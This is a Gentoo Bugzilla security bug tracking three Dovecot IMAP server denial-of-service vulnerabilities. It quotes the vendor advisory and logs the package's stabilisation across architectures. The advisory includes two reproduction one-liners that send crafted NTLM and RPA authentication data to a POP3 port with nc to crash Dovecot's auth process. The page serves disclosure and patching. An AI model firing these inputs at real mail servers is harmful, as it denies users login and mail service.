Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bugzilla DB migration completed. Please report issues to Infra team via email via infra@gentoo.org or IRC
Bug 736617 (CVE-2020-12100, CVE-2020-12673, CVE-2020-12674) - <net-mail/dovecot-2.3.11.3: multiple vulnerabilities (CVE-2020-{12100,12673,12674})
Summary: <net-mail/dovecot-2.3.11.3: multiple vulnerabilities (CVE-2020-{12100,12673,1...
Status: CONFIRMED
Alias: CVE-2020-12100, CVE-2020-12673, CVE-2020-12674
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL:
Whiteboard: B3 [stable cve glsa+]
Keywords: CC-ARCHES, STABLEREQ
Depends on: 739504
Blocks: CVE-2020-10957, CVE-2020-10958, CVE-2020-10967
  Show dependency tree
 
Reported: 2020-08-10 12:35 UTC by Thomas Deutschmann
Modified: 2020-09-18 07:54 UTC (History)
2 users (show)

See Also:
Package list:
=net-mail/dovecot-2.3.11.3
Runtime testing required: ---
nattka: sanity-check+


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Thomas Deutschmann gentoo-dev Security 2020-08-10 12:35:43 UTC
Incoming details.
Comment 1 Thomas Deutschmann gentoo-dev Security 2020-08-12 13:42:11 UTC
Open-Xchange Security Advisory 2020-08-12 

Affected product: Dovecot IMAP server 
Internal reference: DOP-1849 (Bug ID) 
Vulnerability type: Uncontrolled recursion (CWE-674) 
Vulnerable version: 2.0 
Vulnerable component: submission, lmtp, lda 
Fixed version: 2.3.11.3 
Report confidence: Confirmed 
Solution status: Fix available 
Vendor notification: 2020-04-23 
CVE reference: CVE-2020-12100 
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) 

Vulnerability Details: 
Receiving mail with deeply nested MIME parts leads to resource 
exhaustion as Dovecot attempts to 
parse it. 

Risk: 
Malicious actor can cause denial of service to mail delivery by 
repeatedly sending mails with bad 
content. 

Workaround: 
Limit MIME structures in MTA. 

Solution: 
Upgrade to fixed version. 


Affected product: Dovecot IMAP server 
Internal reference: DOP-1870 (Bug ID) 
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation) 
Vulnerable version: 2.2 
Vulnerable component: auth 
Fixed version: 2.3.11.3 
Report confidence: Confirmed 
Solution status: Fix available 
Vendor notification: 2020-05-03 
CVE reference: CVE-2020-12673 
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) 

Vulnerability Details: 
Dovecot's NTLM implementation does not correctly check message buffer 
size, which leads to reading past allocation which can lead to crash. 

Risk: 
An adversary can use this vulnerability to crash dovecot auth process 
repeatedly, preventing login. 

Steps to reproduce: 
(echo 'AUTH NTLM'; echo -ne 
'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA' 
| \ 
base64 -w0 ;echo ;echo -ne 
'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0
0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x02\x00\x00orange\x00'|

\ 
base64 -w0;echo ; echo QUIT)  | nc 127.0.0.1 110 

Workaround: 
Disable NTLM authentication. 

Solution: 
Upgrade to fixed version. 


Affected product: Dovecot IMAP server 
Internal reference: DOP-1869 (Bug ID) 
Vulnerability type: CWE-126 (Buffer over-read) 
Vulnerable version: 2.2 
Vulnerable component: auth 
Fixed version: 2.3.11.3 
Report confidence: Confirmed 
Solution status: Fix available 
Vendor notification: 2020-05-03 
Researcher credit: Orange from DEVCORE team 
CVE reference: CVE-2020-12674 
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) 

Vulnerability Details: 
Dovecot's RPA mechanism implementation accepts zero-length message, 
which leads to assert-crash later on 

Risk: 
An adversary can use this vulnerability to crash dovecot auth process 
repeatedly, preventing login. 

Steps to reproduce: 
(echo 'AUTH RPA'; echo -ne 
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x
00\x01' 
| base64 -w 0; echo ; echo -ne 
'\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' |
base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110 

Workaround: 
Disable RPA authentication. 

Solution: 
Upgrade to fixed version.
Comment 2 Larry the Git Cow gentoo-dev 2020-08-14 09:17:06 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4cffab4e4790734f6acdd76ca5d9112eb13ac019

commit 4cffab4e4790734f6acdd76ca5d9112eb13ac019
Author:     Eray Aslan <eras@gentoo.org>
AuthorDate: 2020-08-14 09:16:48 +0000
Commit:     Eray Aslan <eras@gentoo.org>
CommitDate: 2020-08-14 09:16:48 +0000

    net-mail/dovecot: security bump to 2.3.11.3
    
    Bug: https://bugs.gentoo.org/736617
    Package-Manager: Portage-3.0.2, Repoman-2.3.23
    Signed-off-by: Eray Aslan <eras@gentoo.org>

 net-mail/dovecot/Manifest                |   2 +
 net-mail/dovecot/dovecot-2.3.11.3.ebuild | 288 +++++++++++++++++++++++++++++++
 2 files changed, 290 insertions(+)
Comment 3 Eray Aslan gentoo-dev 2020-08-14 09:46:31 UTC
Arches, please test and mark stable
=net-mail/dovecot-2.3.11.3

Target Keywords = ~alpha amd64 arm ~hppa ~ia64 ~mips ppc ppc64 s390 ~sparc x86
Comment 4 Sam James gentoo-dev Security 2020-08-14 18:14:09 UTC
amd64 done
Comment 5 Sam James gentoo-dev Security 2020-09-05 03:55:39 UTC
ppc64 done
Comment 6 Thomas Deutschmann gentoo-dev Security 2020-09-05 23:47:18 UTC
x86 stable
Comment 7 Thomas Deutschmann gentoo-dev Security 2020-09-06 00:06:44 UTC
New GLSA request filed.
Comment 8 GLSAMaker/CVETool Bot gentoo-dev 2020-09-06 00:27:47 UTC
This issue was resolved and addressed in
 GLSA 202009-02 at https://security.gentoo.org/glsa/202009-02
by GLSA coordinator Thomas Deutschmann (whissi).
Comment 9 Thomas Deutschmann gentoo-dev Security 2020-09-06 00:28:17 UTC
Re-opening for remaining architectures.
Comment 10 Sam James gentoo-dev Security 2020-09-12 19:22:36 UTC
-r1 stabled for arm (with USE=unwind, all but dodgy backtrace tests pass).
Comment 11 Agostino Sarubbo gentoo-dev 2020-09-18 07:54:53 UTC
ppc stable